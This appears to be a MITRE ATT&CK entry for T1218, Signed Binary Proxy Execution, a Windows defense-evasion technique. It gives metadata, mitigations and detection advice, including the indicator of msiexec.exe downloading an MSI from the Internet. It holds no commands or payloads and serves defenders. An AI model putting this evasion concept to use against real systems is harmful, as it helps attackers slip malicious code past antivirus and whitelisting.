Signed Binary Proxy Execution

Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed binaries. Binaries signed with trusted digital certificates can execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files.

ID: T1218
Tactic: Defense Evasion
Platforms: Windows
Permissions Required: Administrator, User
Data Sources: API monitoring, Binary file metadata, DLL monitoring, File monitoring, Loaded DLLs, Process command-line parameters, Process monitoring, Process use of network, Windows Registry
Defense Bypassed: Anti-virus, Application whitelisting, Digital Certificate Validation, Process whitelisting
Contributors: Hans Christoffer Gaardløs; Nishan Maharjan, @loki248; Praetorian
Version: 2.1
Created: 18 April 2018
Last Modified: 29 March 2020

Mitigations

Mitigation Description
Disable or Remove Feature or Program

Many native binaries may not be necessary within a given environment.

Execution Prevention

Consider using application whitelisting to prevent execution of binaries that are susceptible to abuse and not required for a given system or network.

Exploit Protection

Microsoft's Enhanced Mitigation Experience Toolkit (EMET) Attack Surface Reduction (ASR) feature can be used to block methods of using using trusted binaries to bypass whitelisting.

Privileged Account Management

Restrict execution of particularly vulnerable binaries to privileged accounts or groups that need to use it to lessen the opportunities for malicious usage.

Detection

Monitor processes and command-line parameters for signed binaries that may be used to proxy execution of malicious files. Compare recent invocations of signed binaries that may be used to proxy execution with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity. Legitimate programs used in suspicious ways, like msiexec.exe downloading an MSI file from the Internet, may be indicative of an intrusion. Correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators.

Monitor for file activity (creations, downloads, modifications, etc.), especially for file types that are not typical within an environment and may be indicative of adversary activity.